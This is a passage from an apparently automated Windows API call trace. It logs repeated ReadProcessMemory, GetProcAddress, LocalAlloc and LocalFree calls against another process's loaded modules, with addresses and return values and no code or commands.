lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.533] LocalFree (hMem=0x9d020) returned 0x0 [0018.533] LocalFree (hMem=0x9ac20) returned 0x0 [0018.533] LocalFree (hMem=0x9d000) returned 0x0 [0018.533] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x69e60, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.533] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.533] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.533] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x9d000 [0018.533] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x68c08, lpBuffer=0x9d000, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d000*, lpNumberOfBytesRead=0x0) returned 1 [0018.533] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe860000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.533] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.533] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.533] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9d020 [0018.533] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe8600f0, lpBuffer=0x9d020, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d020*, lpNumberOfBytesRead=0x0) returned 1 [0018.533] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.533] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.533] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac20 [0018.533] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe8600f0, lpBuffer=0x9ac20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.533] LocalFree (hMem=0x9d020) returned 0x0 [0018.533] LocalFree (hMem=0x9ac20) returned 0x0 [0018.533] LocalFree (hMem=0x9d000) returned 0x0 [0018.533] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x69f50, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.533] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.533] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.534] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x98330 [0018.534] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x69068, lpBuffer=0x98330, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x98330*, lpNumberOfBytesRead=0x0) returned 1 [0018.534] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7b0000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.534] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.534] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.534] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9d000 [0018.534] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7b00e8, lpBuffer=0x9d000, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d000*, lpNumberOfBytesRead=0x0) returned 1 [0018.534] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.534] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.534] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac20 [0018.534] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7b00e8, lpBuffer=0x9ac20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.534] LocalFree (hMem=0x9d000) returned 0x0 [0018.534] LocalFree (hMem=0x9ac20) returned 0x0 [0018.534] LocalFree (hMem=0x98330) returned 0x0 [0018.534] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x6a040, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.534] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.534] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.534] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x9d000 [0018.534] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x690b8, lpBuffer=0x9d000, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d000*, lpNumberOfBytesRead=0x0) returned 1 [0018.534] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc780000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.534] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.534] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.534] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9d020 [0018.534] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7800f0, lpBuffer=0x9d020, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d020*, lpNumberOfBytesRead=0x0) returned 1 [0018.534] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.534] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.534] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac20 [0018.534] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7800f0, lpBuffer=0x9ac20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.535] LocalFree (hMem=0x9d020) returned 0x0 [0018.535] LocalFree (hMem=0x9ac20) returned 0x0 [0018.535] LocalFree (hMem=0x9d000) returned 0x0 [0018.535] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x6a130,